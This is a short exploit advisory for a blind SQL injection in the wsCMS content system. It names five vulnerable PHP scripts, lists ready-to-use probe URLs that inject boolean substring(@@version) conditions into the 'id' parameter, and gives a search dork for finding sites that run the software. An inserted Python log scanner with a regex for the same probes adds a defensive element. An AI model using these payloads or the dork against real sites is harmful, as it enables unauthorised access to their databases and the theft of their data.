[o] wsCMS Blind SQL Injection Vulnerability
Software : wsCMS
Vendor : http://www.websolutions.ca/
Author : NoGe
[o] Vulnerable files
gallery.php
programs.php
news.php
stories.php
events.php
All of the files above are affected through the "id" parameter.
[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5
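A detection sketch for the requests listed above, added here as an example and not part of the original advisory: it scans web access log lines for requests to the five listed scripts whose "id" value is not a plain integer. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists as affected through the "id" parameter.
AFFECTED = {"gallery.php", "programs.php", "news.php", "stories.php", "events.php"}

# Request line of a combined-format access log entry (assumed log format).
# ".+?" tolerates servers that log the URL with raw, unencoded spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Shape of the advisory's probes: a boolean condition on substring(@@version,...).
PROBE_RE = re.compile(r"substring\s*\(|@@version|\b(?:and|or)\b\s+\S+\s*=", re.I)

# Constructed sample log lines (documentation addresses, made-up paths and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /site/gallery.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /site/news.php?id=1%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /site/news.php?id=1+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5090',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /site/events.php?id=7%27 HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /site/contact.php?id=abc HTTP/1.1" 200 100',
]


def classify(line):
    """Return None for unremarkable lines, else (script, id_value, reason)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: legitimate ids are plain integers
        reason = "boolean-probe" if PROBE_RE.search(value) else "non-integer-id"
        return script, value, reason
    return None


def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for script, value, reason in scan(SAMPLE_LOG):
        print(f"{reason:15} {script:13} id={value!r}")
```

The same all-digits test, applied to "id" before it reaches the query, rejects every request form listed above.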
[o] Dork
"Powered by wsCMS"
[o] Note
This is a private script.